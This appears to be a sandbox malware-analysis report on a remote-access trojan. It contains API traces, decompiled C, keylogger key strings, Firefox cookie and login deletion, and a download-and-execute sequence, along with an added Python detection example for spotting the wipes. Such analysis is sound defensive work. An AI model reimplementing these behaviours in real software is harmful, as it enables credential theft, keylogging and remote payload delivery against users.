                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 004075F0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 0040768B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 00407698
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076A4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076B6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076BF
                                  • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076C6
                                  • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076D0
                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076EC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],00000000,?,?,?,?,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00407704
                                    • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                    • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407717
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407720
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@FindHstd@@V?$basic_string@$FileV01@@V10@$??4?$basic_string@?c_str@?$basic_string@CloseV01@$DeleteErrorFirstLastNextV10@@getenv
                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                  • API String ID: 2907366228-432212279
                                  • Opcode ID: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                  • Instruction ID: 2cb50fe65e7b882f74eabaaae12ed0bec9aebdba7c4873397d04c6de05a2bb48
                                  • Opcode Fuzzy Hash: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                  • Instruction Fuzzy Hash: 0C61A431C0460DEBCB00AFB4DC599EEBB78EF55355F004572E812E3290EB75668ACB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%
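The two API traces above (the logins.json/key3.db routine and the cookies.sqlite routine) describe the same procedure: read UserProfile with getenv, append \AppData\Roaming\Mozilla\Firefox\Profiles\, walk each profile directory with FindFirstFileA/FindNextFileA, call DeleteFileA on the credential and cookie stores, and log "[Firefox StoredLogins Cleared!]" or "[Firefox cookies found, cleared!]" (or the "not found" variants). The Python below is an added example, not code from the sample, from Joe Sandbox or from this report. It turns that trace into two defensive checks: a filter over file-delete telemetry (field names follow Sysmon FileDelete events; the records, the dropper path and the profile directory name are constructed placeholders) and an audit of a Firefox profiles directory for the files the sample removes. Treating key4.db as an acceptable substitute for key3.db is an assumption added here; the sample itself only references key3.db.

```python
r"""
Added example (not code from the sample or the sandbox report): detection
helpers for the Firefox credential/cookie wipe whose API trace appears above.

The trace shows the RAT building %UserProfile%\AppData\Roaming\Mozilla\Firefox\Profiles\*,
walking each profile directory with FindFirstFileA/FindNextFileA, and calling
DeleteFileA on logins.json, key3.db and cookies.sqlite. Two checks follow:
  1. a log check over file-delete telemetry (Sysmon Event ID 23/26 field names,
     records constructed below) for deletions of those files by anything that
     is not firefox.exe;
  2. a host check that reports Firefox profiles no longer holding them.
"""
import os
import re
import tempfile
from typing import Dict, Iterable, List

# Files the sample deletes, taken from the String IDs in the report.
SAMPLE_TARGETS = {"logins.json", "key3.db", "cookies.sqlite"}
# Assumption, not from the report: current Firefox keeps the master key in
# key4.db instead of key3.db, so a profile holding key4.db is treated as intact.
KEY_DB_ALTERNATIVE = "key4.db"
WATCHED = SAMPLE_TARGETS | {KEY_DB_ALTERNATIVE}

# The path shape the sample builds: ...\Mozilla\Firefox\Profiles\<profile>\<file>
PROFILE_FILE_RE = re.compile(
    r"\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\[^\\]+\\([^\\]+)$",
    re.IGNORECASE,
)
BENIGN_IMAGES = {"firefox.exe"}  # the only process expected to remove these files


def is_watched_firefox_file(path: str) -> bool:
    """True when `path` is one of the watched files directly inside a Firefox profile."""
    m = PROFILE_FILE_RE.search(path)
    return bool(m) and m.group(1).lower() in WATCHED


def flag_credential_wipes(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return file-delete events where a non-Firefox process removed a watched file."""
    hits = []
    for ev in events:
        image = ev.get("Image", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if is_watched_firefox_file(ev.get("TargetFilename", "")) and image not in BENIGN_IMAGES:
            hits.append(ev)
    return hits


def audit_profiles(profiles_root: str) -> Dict[str, List[str]]:
    """
    For each profile directory under `profiles_root`, list the sample's target
    files that are absent. An otherwise populated profile missing all three is
    consistent with the "[Firefox StoredLogins Cleared!]" and
    "[Firefox cookies found, cleared!]" code paths having run.
    """
    report: Dict[str, List[str]] = {}
    for name in sorted(os.listdir(profiles_root)):
        pdir = os.path.join(profiles_root, name)
        if not os.path.isdir(pdir):
            continue
        present = {f.lower() for f in os.listdir(pdir)}
        missing = [f for f in sorted(SAMPLE_TARGETS) if f not in present]
        if "key3.db" in missing and KEY_DB_ALTERNATIVE in present:
            missing.remove("key3.db")  # modern key store present, not a wipe
        report[name] = missing
    return report


# Constructed telemetry modelled on Sysmon FileDelete fields; the dropper path
# and profile directory name are placeholders, not values from the report.
DROPPER = r"C:\Users\user\AppData\Roaming\dropped.exe"
PROFILE = r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\abcd1234.default"
SAMPLE_EVENTS = [
    {"EventID": "23", "Image": DROPPER, "TargetFilename": PROFILE + r"\logins.json"},
    {"EventID": "23", "Image": DROPPER, "TargetFilename": PROFILE + r"\key3.db"},
    {"EventID": "23", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "TargetFilename": PROFILE + r"\cookies.sqlite"},  # Firefox itself: benign
    {"EventID": "23", "Image": DROPPER, "TargetFilename": PROFILE + r"\places.sqlite"},  # not watched
    {"EventID": "23", "Image": DROPPER, "TargetFilename": r"C:\Users\user\Documents\notes.txt"},
]


def demo_audit() -> Dict[str, List[str]]:
    """Build two constructed profiles in a temp dir (one intact, one wiped) and audit them."""
    with tempfile.TemporaryDirectory() as root:
        intact = os.path.join(root, "abcd1234.default-release")
        wiped = os.path.join(root, "wxyz5678.default")
        os.makedirs(intact)
        os.makedirs(wiped)
        for f in ("prefs.js", "logins.json", "key4.db", "cookies.sqlite"):
            open(os.path.join(intact, f), "wb").close()
        open(os.path.join(wiped, "prefs.js"), "wb").close()  # everything else gone
        return audit_profiles(root)


if __name__ == "__main__":
    for hit in flag_credential_wipes(SAMPLE_EVENTS):
        print("suspicious delete:", hit["Image"], "->", hit["TargetFilename"])
    for profile, missing in demo_audit().items():
        print(profile, "missing:", missing or "nothing")
```

The log filter keys on the process image rather than on the file alone because Firefox itself rewrites and removes these files during normal operation; only a deletion by a foreign process matches the behaviour recorded in the trace. The host audit is the post-incident counterpart: a profile that still has prefs.js but none of the three stores is the on-disk footprint the "Cleared!" log strings describe.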

                                  C-Code - Quality: 16%
                                  			E00404C0A(intOrPtr* __ecx, char _a4, char _a20) {
                                  				char _v5;
                                  				void* _v12;
                                  				char _v13;
                                  				char _v14;
                                  				void* _v32;
                                  				char _v48;
                                  				short _v64;
                                  				char _v80;
                                  				char _v96;
                                  				void* _v112;
                                  				char _v128;
                                  				char _v144;
                                  				struct _WIN32_FIND_DATAW _v736;
                                  				char* _t73;
                                  				struct _WIN32_FIND_DATAW* _t75;
                                  				void* _t79;
                                  				void* _t81;
                                  				signed int _t96;
                                  				intOrPtr* _t137;
                                  				void* _t139;
                                  				void* _t141;
                                  				signed int _t145;
                                  
                                  				_t137 = __ecx;
                                  				_t60 =  &_v5;
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                  				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                  				__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                  				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                  				E0040504F( &_v5,  &_v5, _t60, __imp__tolower);
                                  				L00414146();
                                  				_t141 = _t139 + 0x1c;
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_a4, "*",  &_v736);
                                  				_v12 = FindFirstFileW( &_v64,  &_v64);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				if(_v12 == 0xffffffff) {
                                  					L11:
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					return 1;
                                  				}
                                  				while(FindNextFileW(_v12,  &_v736) != 0) {
                                  					if((_v736.dwFileAttributes & 0x00000010) != 0 && wcscmp( &(_v736.cFileName), ".") != 0 && wcscmp( &(_v736.cFileName), L"..") != 0) {
                                  						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v5, 0x5c);
                                  						L0041414C();
                                  						L00414152();
                                  						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                  						_t141 = _t141 + 0x18;
                                  						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                  						E00404C0A(_t137,  &_v64,  &_a20,  &_v64,  &_v144,  &_v144,  &_a4,  &(_v736.cFileName),  &(_v736.cFileName));
                                  						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					}
                                  					_t71 =  &(_v736.cFileName);
                                  					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &(_v736.cFileName),  &_v14);
                                  					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                  					__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                  					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                  					E0040504F( &(_v736.cFileName),  &(_v736.cFileName), _t71, __imp__tolower);
                                  					_t141 = _t141 + 0x10;
                                  					_t73 =  &_a20;
                                  					__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z(_t73, 0);
                                  					if(_t73 ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                  						L8:
                                  						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  						continue;
                                  					} else {
                                  						_t75 =  &_v736;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t75, 0x250,  &_v13);
                                  						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t75);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						_t145 = _t141 - 0x10;
                                  						_t96 = _t145;
                                  						_t79 = E00412855( &_v80,  &_v128,  &_a4);
                                  						_t80 =  &_v96;
                                  						L00414140();
                                  						L00414140();
                                  						_t81 = E00402440( &_v96, 0x66, _t96,  &_v96, _t80, _t79, 0x41b310);
                                  						_t141 = _t145 + 0x30;
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ( &_v48,  *_t137);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						if((_t96 & 0xffffff00 | _t81 == 0xffffffff) != 0) {
                                  							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  							return 0;
                                  						}
                                  						goto L8;
                                  					}
                                  				}
                                  				FindClose(_v12);
                                  				goto L11;
                                  			}
                                  Instruction addresses for the C code above, one per statement line in order (0x00000000 for lines without one):
                                  0x00404c16
                                  0x00404c18
                                  0x00404c1f
                                  0x00404c2f
                                  0x00404c39
                                  0x00404c43
                                  0x00404c4a
                                  0x00404c66
                                  0x00404c6b
                                  0x00404c70
                                  0x00404c80
                                  0x00404c83
                                  0x00404c8d
                                  0x00404e83
                                  0x00404e86
                                  0x00404e8f
                                  0x00404e98
                                  0x00000000
                                  0x00404e9e
                                  0x00404c93
                                  0x00404cb2
                                  0x00404cfa
                                  0x00404d0c
                                  0x00404d19
                                  0x00404d27
                                  0x00404d30
                                  0x00404d3f
                                  0x00404d45
                                  0x00404d4e
                                  0x00404d56
                                  0x00404d5e
                                  0x00404d5e
                                  0x00404d6b
                                  0x00404d72
                                  0x00404d7c
                                  0x00404d86
                                  0x00404d90
                                  0x00404d97
                                  0x00404d9c
                                  0x00404d9f
                                  0x00404da8
                                  0x00404db6
                                  0x00404e44
                                  0x00404e47
                                  0x00000000
                                  0x00404dbc
                                  0x00404dc3
                                  0x00404dcf
                                  0x00404dd9
                                  0x00404de2
                                  0x00404ded
                                  0x00404df0
                                  0x00404e00
                                  0x00404e08
                                  0x00404e0c
                                  0x00404e16
                                  0x00404e20
                                  0x00404e25
                                  0x00404e31
                                  0x00404e3a
                                  0x00404e42
                                  0x00404e55
                                  0x00404e5e
                                  0x00404e67
                                  0x00404e70
                                  0x00000000
                                  0x00404e76
                                  0x00000000
                                  0x00404e42
                                  0x00404db6
                                  0x00404e7d
                                  0x00000000

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,770A9F40), ref: 00404C1F
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(77052590,?,770A9F40), ref: 00404C2F
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,770A9F40), ref: 00404C39
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,770A9F40), ref: 00404C43
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                  • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                  • wcscmp.MSVCRT ref: 00404CCA
                                  • wcscmp.MSVCRT ref: 00404CE2
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D5E
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E55
                                    • Part of subcall function 00404C0A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E5E
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E67
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E70
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404D72
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(77052590,?,?,?), ref: 00404D7C
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D86
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D90
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404DA8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404DCF
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404DD9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404DE2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404E0C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404E16
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E31
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E3A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E47
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404E7D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E86
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E8F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E98
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$??0?$basic_string@$Hstd@@V?$basic_string@$?begin@?$basic_string@$FindG@2@@0@V01@@V10@0@$?end@?$basic_string@D@1@@D@2@@0@FileG@1@@V10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstNextV01@V12@
                                  • String ID:
                                  • API String ID: 1504175218-0
                                  • Opcode ID: ba1188e37f3b68199102a69351d283cdde8ffe6f88333a592be0804aeeceea70
                                  • Instruction ID: e99c239ae8235e7f5c20d0f9326128258c52c2c7d0b7d23e31a82f6e10cc2207
                                  • Opcode Fuzzy Hash: ba1188e37f3b68199102a69351d283cdde8ffe6f88333a592be0804aeeceea70
                                  • Instruction Fuzzy Hash: 8A711E7280050EEBCB04EFA0EC899EE777CEF94345F548066F516A31A0EB745649CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [F7] ,?,00000001,?,746B73F0,?), ref: 0040616A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B28,?), ref: 004066F4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B04,?,?,?,?,00000001), ref: 00406846
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                  • String ID: [BckSp] $ [Del] $ [Down] $ [End] $ [Enter] $ [Esc] $ [F10] $ [F11] $ [F12] $ [F1] $ [F2] $ [F3] $ [F4] $ [F5] $ [F6] $ [F7] $ [F8] $ [F9] $ [Left] $ [PagDw] $ [PagUp] $ [Pause] $ [Print] $ [Right] $ [Start] $ [Tab] $ [Up]
                                  • API String ID: 4257247948-3968991301
                                  • Opcode ID: eb2eccc8a731812359348b3976dfce5ea5e72dbce140fbb5fce39ed4468e0386
                                  • Instruction ID: 32f1d40ca48953741c1d4852e97a1265af2d0dfb925f912298a01a30ea5beda6
                                  • Opcode Fuzzy Hash: eb2eccc8a731812359348b3976dfce5ea5e72dbce140fbb5fce39ed4468e0386
                                  • Instruction Fuzzy Hash: 7D32B072A04509BBDB04B6ACC996CFF3A7DE641340B51097BE813B71C2F839596852EF
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D4FC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D523
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D536
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D551
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040D55C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040D57D
                                  • URLDownloadToFileW.URLMON(00000000,00000000,?,00000000), ref: 0040D585
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,?,00000000), ref: 0040D590
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,00000000), ref: 0040D5A2
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,?,00000000), ref: 0040D5B3
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000), ref: 0040D5C0
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D5DD
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040D60E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D625
                                  • free.MSVCRT(?,C:\Windows\SysWOW64\logagent.exe,?), ref: 0040D643
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
